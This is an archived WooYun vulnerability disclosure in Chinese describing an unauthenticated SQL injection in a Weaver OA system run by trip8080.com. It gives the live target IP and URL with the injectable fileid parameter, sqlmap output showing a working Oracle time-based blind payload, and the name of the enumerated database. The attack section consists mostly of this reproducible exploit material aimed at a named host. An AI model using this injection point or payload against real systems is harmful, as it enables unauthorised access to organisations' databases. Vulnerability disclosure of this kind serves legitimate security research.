乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-31: 细节已通知厂商并且等待厂商处理中 2015-08-05: 厂商已经主动忽略漏洞,细节向公众公开
SQL注入
访问http://oa.trip8080.com/跳转到 http://221.6.35.202:8009/
查看源码可知用的泛微的系统参考 WooYun: 泛微某系统通用型SQL注入(无需登录) 构造注入点
http://221.6.35.202:8009/weaver/weaver.email.FileDownloadLocation?fileid=32*&download=1
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] y[00:13:46] [INFO] resuming back-end DBMS 'oracle' [00:13:46] [INFO] testing connection to the target URLsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: #1* (URI) Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: http://221.6.35.202:8009/weaver/weaver.email.FileDownloadLocation?fileid=32 AND 7468=DBMS_PIPE.RECEIVE_MESSAGE(CHR(79)||CHR(87)||CHR(104)||CHR(118),5)&download=1---
参考 WooYun: 泛微某系统通用型SQL注入(无需登录) 构造注入点
available databases [1]:[*] TTS
危害等级:无影响厂商忽略
忽略时间:2015-08-05 10:50
漏洞Rank:4 (WooYun评价)
暂无